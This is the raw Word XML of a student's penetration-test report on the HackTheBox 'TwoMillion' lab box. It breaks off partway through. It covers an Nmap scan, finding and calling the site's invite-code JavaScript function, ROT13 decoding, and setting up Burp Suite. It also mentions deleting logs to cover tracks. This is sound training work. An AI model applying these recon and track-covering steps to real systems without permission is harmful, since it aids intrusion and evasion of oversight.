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6E40B" w14:textId="490FF1E8" w:rsidR="000A7D60" w:rsidRDefault="000A7D60" w:rsidP="000A7D60">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1034F" w14:textId="77777777" w:rsidR="000A7D60" w:rsidRDefault="000A7D60" w:rsidP="000A7D60">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683F9002" w14:textId="74B96A62" w:rsidR="00B72EC6" w:rsidRDefault="00572446" w:rsidP="00572446">
      <w:r>
        <w:tab/>
        <w:t>The box chosen to do is called two million.</w:t>
      </w:r>
      <w:r w:rsidR="006B5EC1">
        <w:t xml:space="preserve"> To begin my hunting, I </w:t>
      </w:r>
      <w:r w:rsidR="006D25AE">
        <w:t xml:space="preserve">first </w:t>
      </w:r>
      <w:r w:rsidR="000A1CD5">
        <w:t xml:space="preserve">find out what information I can obtain about this box, before anything I found </w:t>
      </w:r>
      <w:r w:rsidR="00145FC6">
        <w:t>that this</w:t>
      </w:r>
      <w:r w:rsidR="00B72EC6">
        <w:t xml:space="preserve"> box would be exploitable through an invite code.</w:t>
      </w:r>
      <w:r w:rsidR="00843CBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB6327">
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00843CBC">
        <w:t xml:space="preserve"> understanding that is crucial as I will be attempting web exploitation.</w:t>
      </w:r>
      <w:r w:rsidR="00DA74E1">
        <w:t xml:space="preserve"> To begin the pen test methodology, I decided to go with is the regular pen testing method. It first begins with Reconnaissance. Reconnaissance is the method in which the attacker </w:t>
      </w:r>
      <w:r w:rsidR="007270D5">
        <w:t xml:space="preserve">will begin by looking </w:t>
      </w:r>
      <w:r w:rsidR="00E1569F">
        <w:t xml:space="preserve">for information on the target via websites or anything public that will not let the organization know that they are being looked at. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00595836">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00595836">
        <w:t xml:space="preserve"> the first step I did was look at the information that the box had. It had good information because it stated where the vulnerability can be found</w:t>
      </w:r>
      <w:r w:rsidR="00BA037D">
        <w:t>, in this case</w:t>
      </w:r>
      <w:r w:rsidR="008204C7">
        <w:t xml:space="preserve"> this box was going to be a web exploitation method. The first step was to get myself an invite code, and create a user and soon become an admin. </w:t>
      </w:r>
      <w:r w:rsidR="00E1569F">
        <w:t xml:space="preserve">The next part is enumeration. </w:t>
      </w:r>
      <w:r w:rsidR="00595836">
        <w:t xml:space="preserve">This typically will </w:t>
      </w:r>
      <w:r w:rsidR="008204C7">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00B77706">
        <w:t>noisier and let</w:t>
      </w:r>
      <w:r w:rsidR="00C43F40">
        <w:t xml:space="preserve"> you know that somebody may be looking at your network. In this case my approach is typically using </w:t>
      </w:r>
      <w:r w:rsidR="0021127C">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00C43F40">
        <w:t xml:space="preserve"> to understand the ports that are open on this box. The next part is </w:t>
      </w:r>
      <w:r w:rsidR="00CD1B47">
        <w:t xml:space="preserve">gaining access. In this case the approach is going to be creating a user. This step will be </w:t>
      </w:r>
      <w:r w:rsidR="008C5229">
        <w:t xml:space="preserve">a two part-er since I will be trying to get access as admin by escalating my privilege. The following step is </w:t>
      </w:r>
      <w:r w:rsidR="00CD3399">
        <w:t xml:space="preserve">covering your tracks. The way this would happen is by deleting logs </w:t>
      </w:r>
      <w:r w:rsidR="00D45D88">
        <w:t xml:space="preserve">and making sure that it looks like normal activity going on. The final part is the report and recommendations on the network/box. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3EA0B" w14:textId="2ADDC297" w:rsidR="00D45D88" w:rsidRDefault="00D45D88" w:rsidP="00572446">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">To begin the process, my first take on this box is to look at the information on the box that is listed for me. In this case, as stated earlier, it is vulnerable to web exploitation more specifically through the invite code. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to begin, like anything else I first start with an </w:t>
      </w:r>
      <w:r w:rsidR="00220E5A">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scan. Since I am not trying to hide myself and it doesn’t matter if I am caught</w:t>
      </w:r>
      <w:r w:rsidR="00220E5A">
        <w:t>, I do the regular broad scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54931AFB" w14:textId="2D8FA9A1" w:rsidR="00220E5A" w:rsidRDefault="00220E5A" w:rsidP="00572446">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E8B61" w14:textId="44D2832C" w:rsidR="00315BD5" w:rsidRDefault="00EE472C" w:rsidP="00572446">
      <w:r>
        <w:t>The -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will locate the versions just in case some of the ports that are open are old and can also be exploited. After doing this, the only 2 things that were open is the port 80, and port </w:t>
      </w:r>
      <w:r w:rsidR="00F348C8">
        <w:t xml:space="preserve">22. </w:t>
      </w:r>
      <w:r w:rsidR="00315BD5">
        <w:t xml:space="preserve">Port 22 had the version OpenSSH 8.9p1 Ubuntu and </w:t>
      </w:r>
      <w:r w:rsidR="00C318E4">
        <w:t xml:space="preserve">the port 80 has nginx as its version. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D394C3" w14:textId="7443E807" w:rsidR="00323DC2" w:rsidRDefault="00323DC2" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C29471B" wp14:editId="2F11C791">
            <wp:extent cx="3056162" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2449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9959" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3056162" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CAC118" w14:textId="0F7EAD72" w:rsidR="006E7224" w:rsidRDefault="006E7224" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Understanding this, my next approach is to login the website and see what </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all about.</w:t>
      </w:r>
      <w:r w:rsidR="002A2170">
        <w:t xml:space="preserve"> When going to the website I am looking for the join </w:t>
      </w:r>
      <w:r w:rsidR="00C3159E">
        <w:t>by invite code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504AC50" w14:textId="4D1FF0BC" w:rsidR="00C3159E" w:rsidRDefault="00C3159E" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6340C6" wp14:editId="53962FFA">
            <wp:extent cx="4223567" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="2015035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35565" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4225813" cy="1753532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39DD58" w14:textId="74B7517E" w:rsidR="00C3159E" w:rsidRDefault="00C3159E" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">By clicking on the join HTB I get sent to the page </w:t>
      </w:r>
      <w:r w:rsidR="000D6B6D">
        <w:t xml:space="preserve">that has the invite page. </w:t>
      </w:r>
      <w:r w:rsidR="0025451A">
        <w:t xml:space="preserve">There I began to look for clues on how to </w:t>
      </w:r>
      <w:r w:rsidR="00F504F1">
        <w:t xml:space="preserve">locate certain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F504F1">
        <w:t>apis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F504F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BA09D" w14:textId="7E686350" w:rsidR="00BE619C" w:rsidRDefault="00BE619C" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B6EEF3" wp14:editId="05912AA4">
            <wp:extent cx="2906479" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1850415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5806" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2914213" cy="3371272"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42947B22" w14:textId="66D0CB95" w:rsidR="009F431C" w:rsidRDefault="00BE619C" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">To do this I began by looking </w:t>
      </w:r>
      <w:r w:rsidR="007C56A9">
        <w:t>at the developer tools</w:t>
      </w:r>
      <w:r w:rsidR="009F431C">
        <w:t>. I first inspect the page, to see what the backend of the website looks like.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D86D37" w14:textId="77777777" w:rsidR="00873908" w:rsidRDefault="00DF352A" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFBCEE0" wp14:editId="7E92C6D1">
            <wp:extent cx="5002696" cy="4314825"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="16160766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6657" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5006049" cy="4317717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712D114" w14:textId="3728B675" w:rsidR="00094CAD" w:rsidRDefault="00094CAD" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">If you look below </w:t>
      </w:r>
      <w:r w:rsidR="00DF352A">
        <w:t xml:space="preserve">very closely you can see that there is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DF352A">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF352A">
        <w:t xml:space="preserve">, that says invite. I decided to go ahead and look and see what this has. </w:t>
      </w:r>
      <w:r w:rsidR="00873908">
        <w:t xml:space="preserve">It then brings </w:t>
      </w:r>
      <w:r w:rsidR="00E20F81">
        <w:t xml:space="preserve">me to this page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450168FD" w14:textId="47360544" w:rsidR="00AF30F3" w:rsidRDefault="00AF30F3" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E74C968" wp14:editId="3221BD01">
            <wp:extent cx="5261968" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8877149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4921" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264046" cy="2344075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283DC35" w14:textId="77777777" w:rsidR="00AF30F3" w:rsidRDefault="00AF30F3" w:rsidP="00572446"/>
    <w:p w14:paraId="08E8F0A7" w14:textId="39A401AE" w:rsidR="00C3159E" w:rsidRDefault="007466AA" w:rsidP="00572446">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">It looks like gibberish, and according to the next step </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wanted me to perceive was to decrypt it into something more readable. </w:t>
      </w:r>
      <w:r w:rsidR="00400A6E">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I took the code to </w:t>
      </w:r>
      <w:r w:rsidR="00BA60CF">
        <w:t xml:space="preserve">this website it laid out for me called dev4js. Here I </w:t>
      </w:r>
      <w:r w:rsidR="00810680">
        <w:t xml:space="preserve">simply pasted the code and hit auto decode. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448A1E2" w14:textId="30BBBAA8" w:rsidR="00DD389A" w:rsidRDefault="00DD389A" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CF4829E" wp14:editId="1BF0A246">
            <wp:extent cx="4261373" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="689178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8211" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4263476" cy="4002475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6C1E5" w14:textId="53C8C5B9" w:rsidR="00DD389A" w:rsidRDefault="00DD389A" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">I look at the code and there looks to be a class/function that is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>makeinvitecode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. And in that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it says there is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that it will send you to if you call this function. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to go check it out, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E4C8B">
        <w:t>ctrl+shift+I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E4C8B">
        <w:t xml:space="preserve"> and open up the website developer tool and type in the console and call the function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6BFE5" w14:textId="345CB6CC" w:rsidR="00C91630" w:rsidRDefault="00C91630" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63DD9230" wp14:editId="5645613F">
            <wp:extent cx="5364677" cy="5295900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="21463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49879" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5383001" cy="5313989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D669056" w14:textId="405A0254" w:rsidR="00151FA2" w:rsidRDefault="00151FA2" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">As shown above I typed in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>makeinvitecode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and it gave me information </w:t>
      </w:r>
      <w:r w:rsidR="00AC02AB">
        <w:t xml:space="preserve">on how to get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC02AB">
        <w:t>invitecode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC02AB">
        <w:t xml:space="preserve">. In the hint it says that the best way to decrypt it is by using ROT13. </w:t>
      </w:r>
      <w:r w:rsidR="008F3BC4">
        <w:t>ROT13 is a</w:t>
      </w:r>
      <w:r w:rsidR="008B7F5C">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="008F3BC4">
        <w:t xml:space="preserve"> encryption cipher</w:t>
      </w:r>
      <w:r w:rsidR="00D61294">
        <w:t xml:space="preserve"> that is very standard and not used anymore because it is easy to decrypt. After ta</w:t>
      </w:r>
      <w:r w:rsidR="005832CC">
        <w:t xml:space="preserve">king that line and </w:t>
      </w:r>
      <w:r w:rsidR="005B7E9D">
        <w:t xml:space="preserve">putting it in the </w:t>
      </w:r>
      <w:r w:rsidR="006F1226">
        <w:t>rot13 coder you can find online</w:t>
      </w:r>
      <w:r w:rsidR="002626B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000573C5">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="000573C5" w:rsidRPr="0038082E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://rot13.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A92C1D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009E619E">
        <w:t xml:space="preserve">and the plaintext results into something </w:t>
      </w:r>
      <w:r w:rsidR="00FF4A06">
        <w:t>helpful</w:t>
      </w:r>
      <w:r w:rsidR="009E619E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E094A07" w14:textId="2CFBF216" w:rsidR="009E619E" w:rsidRDefault="00547DD8" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58830EEE" wp14:editId="755975E6">
            <wp:extent cx="4312176" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74531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8374" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4315090" cy="4222427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12519B11" w14:textId="77777777" w:rsidR="00C01222" w:rsidRDefault="006B1EF1" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">With this knowledge I go ahead and copy and paste it into my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and it returned a http 405 error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48FA4A" w14:textId="3F21698C" w:rsidR="00C01222" w:rsidRDefault="008C0EE1" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDAE5B0" wp14:editId="22E28AF1">
            <wp:extent cx="5111576" cy="4076700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180195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51835" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5113483" cy="4078221"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5452D8" w14:textId="47A06302" w:rsidR="00C01222" w:rsidRDefault="006B1EF1" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I decided to turn around and turn on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, a tool to help you figure out </w:t>
      </w:r>
      <w:r w:rsidR="00A24587">
        <w:t xml:space="preserve">web exploitations. It helps you track what requests are being sent and returned that you typically don’t see. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C0EE1">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C0EE1">
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidR="00F30049">
        <w:t xml:space="preserve">load up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F30049">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F30049">
        <w:t xml:space="preserve"> and turn the intercept on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A6417" w14:textId="1A384B7B" w:rsidR="00F30049" w:rsidRDefault="00F30049" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB48007" wp14:editId="225A9224">
            <wp:extent cx="4146304" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="577040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0393" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4147734" cy="2334430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E081647" w14:textId="16C473BB" w:rsidR="001D25A7" w:rsidRDefault="00E44D74" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">I go ahead and refresh the page, and have it captured. </w:t>
      </w:r>
      <w:r w:rsidR="00C62492">
        <w:t>I then sent it to the repeater</w:t>
      </w:r>
      <w:r w:rsidR="00683125">
        <w:t xml:space="preserve"> by hitting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00683125">
        <w:t>ctrl+r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00683125">
        <w:t xml:space="preserve">. Why you may ask I send it to the repeater, well with the repeater you can take certain requests that you are making to the server and modifying so you can see what results are </w:t>
      </w:r>
      <w:r w:rsidR="00683125">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">being sent back. This is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00683125">
        <w:t>really useful</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00683125">
        <w:t xml:space="preserve"> because if there </w:t>
      </w:r>
      <w:r w:rsidR="003D0E9A">
        <w:t xml:space="preserve">is something miscoded </w:t>
      </w:r>
      <w:r w:rsidR="00EC50B9">
        <w:t xml:space="preserve">the results will show you that error and a potential vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE479F1" w14:textId="612ADBD6" w:rsidR="00C62492" w:rsidRDefault="00C62492" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444081A0" wp14:editId="75E3CA29">
            <wp:extent cx="5660027" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="2143537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37199" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
